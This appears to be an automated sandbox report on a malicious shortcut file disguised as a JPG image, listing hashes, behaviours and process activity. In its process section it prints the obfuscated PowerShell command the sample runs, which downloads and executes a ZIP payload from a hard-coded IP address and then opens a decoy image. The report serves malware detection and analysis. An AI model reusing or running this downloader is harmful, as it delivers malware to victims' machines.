Analysis
- max time kernel: 16s
- max time network: 17s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 31/08/2024, 01:02
Tasks
- Static task static1
- Behavioral task behavioral1: sample brt_1_0147.doc.lnk, resource win7-20240704-en
- Behavioral task behavioral2: sample brt_1_0147.doc.lnk, resource win10v2004-20240802-en
- Behavioral task behavioral3: sample oshad_88.docx.lnk, resource win7-20240704-en
- Behavioral task behavioral4: sample oshad_88.docx.lnk, resource win10v2004-20240802-en
- Behavioral task behavioral5: sample rv_luti_2024_roku.xlsx.lnk, resource win7-20240708-en
- Behavioral task behavioral6: sample rv_luti_2024_roku.xlsx.lnk, resource win10v2004-20240802-en
- Behavioral task behavioral7: sample telegrama_ksv_po_btgr.jpg.lnk, resource win7-20240729-en
General
- Target: telegrama_ksv_po_btgr.jpg.lnk
- Size: 691KB
- MD5: 27fea6f5fbaffbbf1479cd9dfa9604fa
- SHA1: ffe89c8b62b0faf639b056972db1a1974c53efa0
- SHA256: df7d2e54b67a7788dd7c326a6c2a1c5b935b94288622fb7bbeff3ba336205cd7
- SHA512: e901089462cd9d54f6de3d98ddaf10d94a3b1dc8ad5fb48f7facf0e3b8afcd97aa0caf3616f6548dcc3bb7e1eb8d6bc476bb8387c7cb0f689d0bab023c5deba5
- SSDEEP: 48:8xmuavUQSsejrK5053YMEDo//pxCMGopDDo/39OKXJa7x:8xy86enc+3hX/pxC530KXJQ
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid: 812, process: powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege, pid: 812, process: powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   process   procid_target
  PID 1244 wrote to memory of 812    1244  cmd.exe   31
  PID 1244 wrote to memory of 812    1244  cmd.exe   31
  PID 1244 wrote to memory of 812    1244  cmd.exe   31
Processes
- C:\Windows\system32\cmd.exe (PID: 1244)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\telegrama_ksv_po_btgr.jpg.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 812, child of 1244)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo LCgtGMtcQQJaJlfGEbTWGQtHPnXvshSydqPjdadyHUqlchGjSeaWM; echo oIhdvwvvpCFrPXEuFwytiupeuuztBsyBbTIlLfifAJQuXhxp; echo HOoXHdZuZstQdflDScvNdstDTjusTXRkquolxTidEJXSlFbSdEjjTwx; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo jrJBbRkXWBdTmxLNkFmKcFkZNZRRTGZzEWLuBEZHNAvBPkncUoAZKvCdHl; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo JuhGhuKkmGFuLZMyQwPXHdhWkLqUpKudPsEClUijthIIp; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/telegrama_ksv_po_btgr.jpg -OutFile telegrama_ksv_po_btgr.jpg; echo CndnhqGwRKEgfnUJozdJravfXsLW; s''t''a''rt telegrama_ksv_po_btgr.jpg
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken